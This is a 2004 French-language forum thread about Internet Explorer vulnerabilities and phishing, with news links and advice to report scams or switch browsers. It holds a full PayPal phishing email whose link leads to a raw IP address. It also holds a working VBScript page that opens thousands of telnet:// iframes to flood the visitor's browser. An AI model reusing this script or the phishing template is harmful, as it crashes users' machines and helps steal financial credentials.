Internet Explorer : une troisième faille

Quand tout est (trop ?) bien organisé, il y a besoin d'une ouverture. Ici on parle de tout, mais pas de n'importe quoi et toujours dans le respect d'autrui, vous êtes prévenus.
Répondre
golum
Salamandre
Messages : 42
Inscription : 18 mars 2004, 03:42

Internet Explorer : une troisième faille

Message par golum »

Futura Sciences -
Contrairement à ce que certains ont pensé, la dernière mise à jour de Windows Update ne corrige pas les 2 failles dont nous avons précédemment parlé (voir notre précédent article). Toutefois un certain nombre d'antivirus semblent capables de ...

http://www.futura-sciences.com/sinformer/n/news3855.php
jv2759
Tyrannosaurus Rex
Messages : 4161
Inscription : 12 févr. 2004, 14:29

Message par jv2759 »

Je sais plus ou j'avais lut cela mais microsoft à prévut de les corriger mi juillet les faille. En fait il dissait le second mercredi de juillet, histoir d'adoucir un peux.

Sinon pour les anti-virus, moi j'ai le meilleur pour ce genre de virus... firefox;)
Avatar de l’utilisateur
Mori
Animal mythique
Messages : 13311
Inscription : 30 avr. 2004, 19:17

Message par Mori »

Ce type d’attaques, qui consiste à se faire passer pour un site bien connu et récupérer frauduleusement des informations que les utilisateurs donneront en toute confiance s’appelle le phishing. Certains site bien connus, comme E-bay ou Paypal risquent d’être pris pour cible (ils l’ont été dans le passé avec des techniques moins sophistiquées, mais basées sur le fait d’imiter un message authentique du site).
Il n’y a pas de parade actuelle à ce problème, sauf votre vigilance ou l’utilisation d’un navigateur basé sur un autre moteur que celui d’Internet Explorer.
le message est, on ne peut plus clair...
il faudrait peut-être suggérer à MS de numéroter ses failles comme les évolutions de logiciels : faille 1.6.3 :twisted:
en leur soumettant l'éventualité de l'inutilité des points. :lol:

le phishing ? :shock: le fishing ! oui :P ... avec moz, en tout cas, on ne va pas à la pêche.

Linux Salix OS 15.0 / Xfce 4.16

mildred593
Arias
Messages : 10
Inscription : 10 févr. 2004, 01:18

Message par mildred593 »

Ca me fait penser à un spam que j'ai recu un jour:

Code : Tout sélectionner

From - Wed Feb 25 23:35:24 2004
X-UIDL: 1077748050.2800.mx1-1
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <service@paypal.com>
Delivered-To: online.fr-silkensedai@online.fr
Received: (qmail 2763 invoked from network); 25 Feb 2004 22:27:29 -0000
Received: from 68-174-151-44.nyc.rr.com (68.174.151.44)
  by mx1-1.free.fr with SMTP; 25 Feb 2004 22:27:29 -0000
Received: from 192.244.59.120 by 68.174.151.44;Wed, 25 Feb 2004 17:23:25 -0500
Message-ID: <KKORSGAIKSZORBVBQFUCUVB@msn.com>
From: "service@paypal.com" <service@paypal.com>
Reply-To: "service@paypal.com" <service@paypal.com>
To: sholari@online.fr, shubcorp@online.fr, silkensedai@online.fr, siteordo@online.fr, sitepp@online.fr, smconcept@online.fr, spara@online.fr
Subject: Information Update
Date: Thu, 26 Feb 2004 03:21:25 +0500
X-Mailer: QUALCOMM Windows Eudora Version 5.1
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="--19805085275850732833"
X-Priority: 3
X-MSMail-Priority: Normal

----19805085275850732833
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>

<link rel=3D"stylesheet" type=3D"text/css" href=3D"http://www.paypal.com/c=
ss/pp_styles_ns6_111402.css">

<body bgcolor=3D"#ffffff">
<img src=3D"http://www.paypal.com/images/paypal_logo.gif">
<table cellSpacing=3D0 cellPadding=3D0 width=3D"100%" border=3D0>

<tbody>
<tr>
<td width=3D"100%" background=3D"http://www.paypal.com/images/bg_clk.gif">=
<img height=3D29 src=3D"http://www.paypal.com/images/pixel.gif" width=3D1 =
border=3D0></td></tr>
<tr>

<td><img height=3D10 src=3D"http://www.paypal.com/images/pixel.gif" width=3D=
1   border=3D0></td></tr></tbody></table>

<br>
<font class=3D"pptext">
Dear PayPal member,<br>
At PayPal, we value the trust you have placed in us by using our service t=
o conduct your transactions<br>online. Because our relationship with you i=
s financial in nature, the protection of your privacy is particularly<br>i=
mportant to us.
<br><br>

We are sending this verification notice to provide you with information ab=
out how PayPal safeguards<br>
your privacy, as well as to comply with U.S. federal privacy guidelines th=
at apply to financial institutions<br>
such as PayPal. The full terms of PayPal's privacy policy are available on=
 the PayPal website, which you<br>are welcome to review at any time.
<br><br>

<b>Please verify your account and financial information by clicking on the=
 link below:</b><br>
<a href=3D"http://216.12.215.202/paypal/verify/">https://www.paypal.com/cg=
i-bin/webscr?cmd=3Dverify</a>
<br><br>
<b>*** DO NOT REPLY TO THIS EMAIL ***</b>


</font>
<br><br><br>
<center>
Copyright=A9 2003 PayPal, Inc. All rights reserved. Designated trademarks =
and brands are the property<br>of their respective owners.
</center>

</body>

</html>



----19805085275850732833--

Dans ces cas la, il vaut mieux avertir payPal ou l'organisme concerné
Avatar de l’utilisateur
Mori
Animal mythique
Messages : 13311
Inscription : 30 avr. 2004, 19:17

Message par Mori »

il vaut mieux ne pas utiliser un reply, dans aucune adresse d'un mail soupçonné de junk.
va sur le site de ripe, apnic, etc... (selon la zone web) pour le whois de paypal.com ou de l'autre boîte : tu auras l'adresse de l'abuse... tu envoies ta requête avec le junked mail.

Linux Salix OS 15.0 / Xfce 4.16

olab
Varan
Messages : 1254
Inscription : 30 juil. 2003, 20:20

Message par olab »

J'ajouterais, pour rester dans le sujet du fil, que les "experts" s'y mettent aussi :

Source : http://www.clubic.com/n/n13168.html
...Cette affaire a été la goutte d'eau qui a fait déborder le vase pour certains experts. A tel point que certains organismes dédiés à la sécurité comme l'US-CERT (US Computer Emergency Readiness Team) donne un conseil sans équivoque : "Use a different web browser" (utilisez un autre navigateur)....
ClémentD
Lézard à collerette
Messages : 330
Inscription : 21 déc. 2003, 12:40

Message par ClémentD »

olab a écrit :J'ajouterais, pour rester dans le sujet du fil, que les "experts" s'y mettent aussi :
Je rajouterais :
http://www.pcinpact.com/actu/news/La_US ... plorer.htm
http://www.materiel.be/news/5825/#0

Et je suis agréablement surpris de voir dans les commentaires de moins en moins de messages anti Mozilla :)
XF007
Lézard vert
Messages : 174
Inscription : 02 mai 2004, 18:37

Message par XF007 »

Ptite demo :
(a essayer que si vous êtes maso, ca ouvre 8 000 fenetres telnet vers mirososft.com)
http://dejean.benoit.free.fr/img/bass_fishin.gif
:?
jv2759
Tyrannosaurus Rex
Messages : 4161
Inscription : 12 févr. 2004, 14:29

Message par jv2759 »

XF007 a écrit :Ptite demo :
(a essayer que si vous êtes maso, ca ouvre 8 000 fenetres telnet vers mirososft.com)
http://dejean.benoit.free.fr/img/bass_fishin.gif
:?
j'ai essayer cela, marant;) En tout cas je préfére la version firefox;)

Le seul truc que je me demande c'est si on peux en plus cacher la fenetre et passer des argument...
XF007
Lézard vert
Messages : 174
Inscription : 02 mai 2004, 18:37

Message par XF007 »

le code c'est ca :

Code : Tout sélectionner

<html>
<body>
<H1> netric 0wnz y00! </H1>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>

<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next

</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>

</body>

</html>

Donc je ne pense pas qu'on puisse lancer n'importe quel prog ...
Seulement ceux qui sont associés a un protocole
Répondre

Qui est en ligne ?

Utilisateurs parcourant ce forum : Aucun utilisateur inscrit et 1 invité